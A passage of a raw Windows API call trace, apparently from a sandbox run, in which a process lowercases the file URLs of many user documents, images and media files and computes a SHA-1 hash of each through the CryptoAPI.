[0067.350] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.350] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6a, dwFlags=0x0) returned 1 [0067.350] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.350] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.350] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/3J38TW6.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/3j38tw6.gif") returned="file:///c:/users/ciihmnxmn6ps/desktop/3j38tw6.gif" [0067.350] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.350] CryptHashData (hHash=0x65edc8, pbData=0x198270, dwDataLen=0x64, dwFlags=0x0) returned 1 [0067.350] CryptGetHashParam (in: hHash=0x65edc8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.350] CryptDestroyHash (hHash=0x65edc8) returned 1 [0067.350] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.350] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x66, dwFlags=0x0) returned 1 [0067.350] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.350] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.350] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/6Xg_Gp_xQ2DKvaLBp.odp" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/6xg_gp_xq2dkvalbp.odp") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/6xg_gp_xq2dkvalbp.odp" [0067.350] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.350] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x88, dwFlags=0x0) returned 1 [0067.350] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.350] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.350] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.350] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0067.350] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.350] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.350] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/KTz3.gif" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/ktz3.gif") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/ktz3.gif" [0067.350] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.350] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x94, dwFlags=0x0) returned 1 [0067.350] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.350] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.350] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.350] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x96, dwFlags=0x0) returned 1 [0067.350] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.350] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.350] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/VJTGuQpC4V0Zz.png" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/vjtguqpc4v0zz.png") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/xaoloz/q4-fpj4h2n7/vjtguqpc4v0zz.png" [0067.350] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.350] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0xa6, dwFlags=0x0) returned 1 [0067.350] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.350] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.351] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.351] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0xa8, dwFlags=0x0) returned 1 [0067.351] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.351] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.351] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/jG1QAVzkTXE.doc" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/jg1qavzktxe.doc") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/jg1qavzktxe.doc" [0067.351] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.351] CryptHashData (hHash=0x65ee08, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.351] CryptGetHashParam (in: hHash=0x65ee08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.351] CryptDestroyHash (hHash=0x65ee08) returned 1 [0067.351] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.351] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7e, dwFlags=0x0) returned 1 [0067.351] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.351] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.351] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/CIvwLQB/8W9mM5.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/civwlqb/8w9mm5.m4a") returned="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/civwlqb/8w9mm5.m4a" [0067.351] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.351] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x92, dwFlags=0x0) returned 1 [0067.351] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.351] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.351] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.351] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x94, dwFlags=0x0) returned 1 [0067.351] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.351] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.351] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/DVOPy5vlQ5Wu.mp4" | out: _String="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/dvopy5vlq5wu.mp4") returned="file:///c:/users/ciihmnxmn6ps/videos/_4zpq5h6/5phl/dvopy5vlq5wu.mp4" [0067.351] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.351] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x88, dwFlags=0x0) returned 1 [0067.351] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.351] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.351] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.351] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x8a, dwFlags=0x0) returned 1 [0067.351] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.351] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.351] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/acbQOvmCpgF.m4a" | out: _String="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/acbqovmcpgf.m4a") returned="file:///c:/users/ciihmnxmn6ps/music/mbffffzaro85qn2y7/acbqovmcpgf.m4a" [0067.351] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.351] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0067.351] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.351] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.351] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.351] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0067.351] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.351] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.351] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/e8e2JHp0P_Oa5cl.xlsx" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/e8e2jhp0p_oa5cl.xlsx") returned="file:///c:/users/ciihmnxmn6ps/documents/e8e2jhp0p_oa5cl.xlsx" [0067.351] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.351] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0067.351] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.352] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.352] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.352] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.352] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.352] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.352] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/aUgm3Jy7lNg_a32UyI.xls" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/augm3jy7lng_a32uyi.xls") returned="file:///c:/users/ciihmnxmn6ps/desktop/oazobv-gdm/augm3jy7lng_a32uyi.xls" [0067.352] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.352] CryptHashData (hHash=0x65edc8, pbData=0x198270, dwDataLen=0x90, dwFlags=0x0) returned 1 [0067.352] CryptGetHashParam (in: hHash=0x65edc8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.352] CryptDestroyHash (hHash=0x65edc8) returned 1 [0067.352] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.352] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x92, dwFlags=0x0) returned 1 [0067.352] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.352] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.352] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/XUht%2042%20skvPCG.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/xuht%2042%20skvpcg.jpg") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/xuht%2042%20skvpcg.jpg" [0067.352] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.352] CryptHashData (hHash=0x65ecc8, pbData=0x198270, dwDataLen=0xb0, dwFlags=0x0) returned 1 [0067.352] CryptGetHashParam (in: hHash=0x65ecc8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.352] CryptDestroyHash (hHash=0x65ecc8) returned 1 [0067.352] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.352] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0xb2, dwFlags=0x0) returned 1 [0067.352] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.352] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.352] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/27qyanvwcf-uw") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kbajl3vp3jeawydrpj/27qyanvwcf-uw" [0067.352] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.352] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x9e, dwFlags=0x0) returned 1 [0067.352] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.352] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.352] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.352] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0067.352] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.352] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.352] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/j5fG4lD94cLAZ/YCXkBZ.pps" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/ycxkbz.pps") returned="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz/ycxkbz.pps" [0067.352] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.352] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x82, dwFlags=0x0) returned 1 [0067.352] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.352] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.352] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.352] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x84, dwFlags=0x0) returned 1 [0067.352] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.352] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.352] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Desktop/ujeLA3jz.ots" | out: _String="file:///c:/users/ciihmnxmn6ps/desktop/ujela3jz.ots") returned="file:///c:/users/ciihmnxmn6ps/desktop/ujela3jz.ots" [0067.352] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.352] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x66, dwFlags=0x0) returned 1 [0067.352] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.353] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.353] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.353] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x68, dwFlags=0x0) returned 1 [0067.353] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.353] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.353] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/-2ENIUXDxr.jpg" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/-2eniuxdxr.jpg") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/-2eniuxdxr.jpg" [0067.353] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.353] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x7a, dwFlags=0x0) returned 1 [0067.353] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.353] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.353] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.353] CryptHashData (hHash=0x65ec88, pbData=0x198270, dwDataLen=0x7c, dwFlags=0x0) returned 1 [0067.353] CryptGetHashParam (in: hHash=0x65ec88, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.353] CryptDestroyHash (hHash=0x65ec88) returned 1 [0067.353] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Documents/j5fG4lD94cLAZ" | out: _String="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz") returned="file:///c:/users/ciihmnxmn6ps/documents/j5fg4ld94claz" [0067.353] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.353] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x6c, dwFlags=0x0) returned 1 [0067.353] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.353] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.353] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.353] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x6e, dwFlags=0x0) returned 1 [0067.353] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.353] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.353] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/KVSDo8.png" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kvsdo8.png") returned="file:///c:/users/ciihmnxmn6ps/pictures/_wvdo-/kvsdo8.png" [0067.353] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.353] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x72, dwFlags=0x0) returned 1 [0067.353] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.353] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.353] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.353] CryptHashData (hHash=0x65f108, pbData=0x198270, dwDataLen=0x74, dwFlags=0x0) returned 1 [0067.353] CryptGetHashParam (in: hHash=0x65f108, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.353] CryptDestroyHash (hHash=0x65f108) returned 1 [0067.353] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/mTpMVKIgbxhmX.wav" | out: _String="file:///c:/users/ciihmnxmn6ps/music/czp7-etnxlndqfn/mtpmvkigbxhmx.wav") returned="file:///c:/users/ciihmnxmn6ps/music/czp7-etnxlndqfn/mtpmvkigbxhmx.wav" [0067.353] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.353] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0067.353] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.353] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.353] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.353] CryptHashData (hHash=0x65f088, pbData=0x198270, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0067.353] CryptGetHashParam (in: hHash=0x65f088, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.353] CryptDestroyHash (hHash=0x65f088) returned 1 [0067.353] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/yTQMmSq.bmp" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/ytqmmsq.bmp") returned="file:///c:/users/ciihmnxmn6ps/pictures/pkrrvscvv%20wda1wj/ytqmmsq.bmp" [0067.353] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.353] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0067.353] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.354] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.354] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.354] CryptHashData (hHash=0x65ed08, pbData=0x198270, dwDataLen=0x8e, dwFlags=0x0) returned 1 [0067.354] CryptGetHashParam (in: hHash=0x65ed08, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.354] CryptDestroyHash (hHash=0x65ed08) returned 1 [0067.354] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/8LpINJY%20zlLwLs.mp3" | out: _String="file:///c:/users/ciihmnxmn6ps/appdata/roaming/8lpinjy%20zllwls.mp3") returned="file:///c:/users/ciihmnxmn6ps/appdata/roaming/8lpinjy%20zllwls.mp3" [0067.354] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.354] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x86, dwFlags=0x0) returned 1 [0067.354] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.354] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.354] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.354] CryptHashData (hHash=0x65f2c8, pbData=0x198270, dwDataLen=0x88, dwFlags=0x0) returned 1 [0067.354] CryptGetHashParam (in: hHash=0x65f2c8, dwParam=0x2, pbData=0x198234, pdwDataLen=0x19824c, dwFlags=0x0 | out: pbData=0x198234, pdwDataLen=0x19824c) returned 1 [0067.354] CryptDestroyHash (hHash=0x65f2c8) returned 1 [0067.354] _wcslwr (in: _String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/GLNuzWWD7.png" | out: _String="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/glnuzwwd7.png") returned="file:///c:/users/ciihmnxmn6ps/pictures/4q9ob0ibjjfoe2oqh/glnuzwwd7.png" [0067.354] CryptCreateHash (in: hProv=0x671840, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x198250 | out: phHash=0x198250) returned 1 [0067.354] 